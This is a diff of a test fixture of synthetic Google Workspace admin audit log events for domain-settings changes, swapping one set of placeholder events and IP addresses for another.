-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VIEW_DNS_LOGIN_DETAILS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_LOCALE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_TIMEZONE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_PRE_RELEASE_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_SUPPORT_MESSAGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EDU_TYPE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSO_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_TRANSFER_TOKEN"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BACKGROUND_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BORDER_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_ACTIVITY_TRACE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_ENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"},{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_UNENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"MX_RECORD_VERIFICATION_CLAIM","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_NEW_APP_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPLOAD_OAUTH_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REGENERATE_OAUTH_CONSUMER_SECRET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OPEN_ID_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ORGANIZATION_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OUTBOUND_RELAY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MAX_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MIN_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RENEW_DOMAIN_REGISTRATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RESELLER_ACCESS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RULE_ACTIONS_CHANGED","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RULE_CRITERIA","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_RULE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RULE_STATUS_CHANGED","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RULE_NAME","value":"rule"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_SECONDARY_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_SSO_SETTINGS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_PIN"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ACCOUNT_AUTO_RENEWAL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"NON_AUTO_RENEWAL"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_ENABLED","value":"app enabled"},{"name":"APPLICATION_NAME","value":"app name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION_TO_WHITELIST","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_NAME","value":"app name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ADVERTISEMENT_OPTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ALERT_CRITERIA","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_RECEIVERS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_ALERT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_STATUS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
